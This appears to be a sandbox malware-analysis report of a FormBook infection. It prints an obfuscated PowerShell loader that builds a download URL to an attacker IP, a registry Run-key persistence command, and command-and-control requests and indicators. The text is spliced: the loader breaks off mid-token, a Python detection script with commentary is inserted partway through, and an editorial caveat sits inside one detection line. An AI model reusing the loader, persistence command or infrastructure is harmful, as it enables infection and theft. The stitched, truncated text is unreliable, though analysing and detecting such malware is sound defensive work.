Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", ProcessId: 5176, ProcessName: wscript.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5512, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ProcessId: 3360, ProcessName: cmd.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Achaque
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3360, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ProcessId: 5616, ProcessName: reg.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5512, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)", ProcessId: 3360, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe" , ParentImage: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe, ParentProcessId: 4092, ParentProcessName: TsrCaEwNrfOKANGWcsg.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 6664, ProcessName: xcopy.exe
Source: Registry Key set; Author: frack113, Florian Roth (Nextron Systems); Data: Details: %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Achaque
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs", ProcessId: 5176, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy21
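The two Sigma hits above key on the same process-creation fields (ParentImage, Image, CommandLine). The Python below is an added example, not part of the Joe Sandbox report and not a Sigma rule, showing how a detection pipeline can fold those fields into one score: a script host (wscript.exe or cscript.exe) spawning a shell, a command line longer than a threshold (the 4096-character threshold is an assumption for this example; the report only records that the 7566-character command line is very long), and the obfuscation idioms visible in this sample's command line (a method name assembled from string fragments with +=, a reflective $obj.$name.Invoke( call, and dot-sourcing a variable that holds iex). The sample events are constructed; the third quotes the opening of the real script portion but is shortened, so the length rule does not fire on it here.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    # Field names follow the process-creation record quoted in the report.
    image: str
    parent_image: str
    command_line: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Assumed threshold for this example; the report only records that the
# sample's 7566-character command line is "very long".
LONG_CMDLINE = 4096

# Obfuscation idioms taken from this sample's own command line.
OBFUSCATION_MARKERS = {
    "method name assembled from string fragments": re.compile(r"\+='\w*'"),
    "reflective member call via .Invoke(": re.compile(r"\.\$\w+\.Invoke\("),
    "dot-sourcing a variable that holds iex": re.compile(r"\.\s*\(\$\w+\)\s*\(\$\w+\)"),
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list:
    """Return the reasons this event looks like a script-host dropper chain."""
    reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in SCRIPT_HOSTS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    if len(ev.command_line) > LONG_CMDLINE:
        reasons.append(f"command line is {len(ev.command_line)} characters")
    for label, pattern in OBFUSCATION_MARKERS.items():
        if pattern.search(ev.command_line):
            reasons.append(label)
    return reasons


def is_suspicious(ev: ProcEvent) -> bool:
    # A single reason (wscript running "cmd /c dir") is noisy on its own;
    # require at least two before alerting.
    return len(score_event(ev)) >= 2


# Constructed telemetry. The third event quotes the opening of the script
# portion of the command line in the report, shortened so the length rule
# does not fire on it here.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line="powershell.exe -NoProfile -Command Get-Date",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\cmd.exe",
        parent_image=r"C:\Windows\System32\wscript.exe",
        command_line=r"C:\Windows\system32\cmd.exe /c dir",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\System32\wscript.exe",
        command_line=(
            "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';"
            "$Elytrigerous+='ubstrin';$Elytrigerous+='g';"
            "Function Programregningsfunktionens($Ridderne){"
            "$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;"
            "For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; "
            "$Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( "
            "$Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}"
            "function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}"
        ),
    ),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev.parent_image), "->", basename(ev.image), score_event(ev))
```

The markers are deliberately narrow: they match the string-building and reflective-call shapes this loader uses rather than any use of Invoke-Expression, so a benign -EncodedCommand or a long but plain installer command line scores on length alone and does not alert.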
        Timestamp:05/02/24-17:15:19.980855
        SID:2855464
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-17:15:22.949006
        SID:2855464
        Source Port:49728
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/02/24-17:15:04.232595
        SID:2855465
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        AV Detection

        Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware (caveat: this URL is the icon URI from the manifest of the Pester module bundled with Windows PowerShell, and the same powershell.exe memory region also holds the Pester GitHub and Apache-licence URLs listed under Networking; the string is present independent of the sample, so this reputation hit should not be used as an indicator for this malware)
        Source: Yara match | File source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbV source: powershell.exe, 0000000B.00000002.2871144100.00000000074DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5T source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn[ source: powershell.exe, 0000000B.00000002.2871144100.00000000074AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, xcopy.exe
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2871144100.00000000074E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: xcopy.pdb source: wab.exe
        Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 22_2_02F4B7A0 FindFirstFileW, FindNextFileW, FindClose

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\SysWOW64\xcopy.exe | Code function: 4x nop then xor eax, eax | 22_2_02F393E0

        Networking

        Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49725 -> 34.174.122.2:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 3.33.130.190:80
        Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 3.33.130.190:80
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
        Source: Joe Sandbox View | ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
        Source: unknown | TCP traffic detected without corresponding DNS query: 87.121.105.54 (50 occurrences)
        Source: global traffic | HTTP traffic detected:
            GET /Ommestrup.deploy HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: 87.121.105.54
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            GET /iYbZIhIVLPBjJUzImyrJN72.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: 87.121.105.54
            Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected:
            GET /gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.facesofhoustontx.com
            Connection: close
            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: global traffic | DNS traffic detected: DNS query: google.com
        Source: global traffic | DNS traffic detected: DNS query: www.facesofhoustontx.com
        Source: global traffic | DNS traffic detected: DNS query: www.timesrenewables.com
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3288836081.000001EF2AE16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://87.121.105.54
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://87.121.105.54/Ommestrup.deployP
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF2AFCA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://87.121.H
        Source: wscript.exe, 00000000.00000003.2228249019.0000022CBEC96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2227533901.0000022CBEC2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2228795588.0000022CBEC96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: wscript.exe, 00000000.00000002.2228998163.0000022CC0B70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, 00000000.00000003.2183539052.0000022CC0BA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2182822284.0000022CC0BFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183808324.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ae76aada72762
        Source: wscript.exe, 00000000.00000003.2183539052.0000022CC0BA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2223236655.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183808324.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ae76aada72
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000008.00000002.3288836081.000001EF2A2CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

        E-Banking Fraud

        Source: Yara match | File source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        Source: amsi64_5692.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
        Source: amsi32_6096.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
        Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
        Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
        Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
        Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
        Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
        Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
        Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
        Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 7566
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 7566
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
